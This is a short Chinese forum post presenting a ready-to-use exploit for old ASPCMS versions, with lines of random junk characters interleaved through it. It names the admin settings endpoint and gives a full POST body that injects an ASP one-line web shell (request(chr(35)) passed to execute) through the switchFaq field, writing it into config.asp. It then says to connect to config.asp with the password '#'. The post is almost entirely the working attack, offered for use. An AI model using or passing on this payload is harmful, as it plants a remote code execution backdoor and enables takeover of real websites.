老的ASPCMS版本的秒杀拿SHELL漏洞
6 V, @6 s* K! N4 U$ y0 t6 E# B) j3 y* M; [4 V
找到后台。。。然后
4 i% g; ~$ f. m+ I( e& h8 @
( s8 o( ~7 [4 F& ~0 O/admin/_system/AspCms_SiteSetting.asp?action=saves9 f* s. d5 d) w9 Q3 {1 w
* {# V2 R3 Y; J. E [" j
直接POST
# ?) C9 Q& m1 R! O
) s3 I9 B9 \. w; K3 ErunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1! J1 H; o3 E3 }9 c( z" x- s7 D
/ R6 g3 E% a" x! ]" V
再连接配置文件config.asp 密码为#. M" \) r/ r% Z; P' t) `; _
|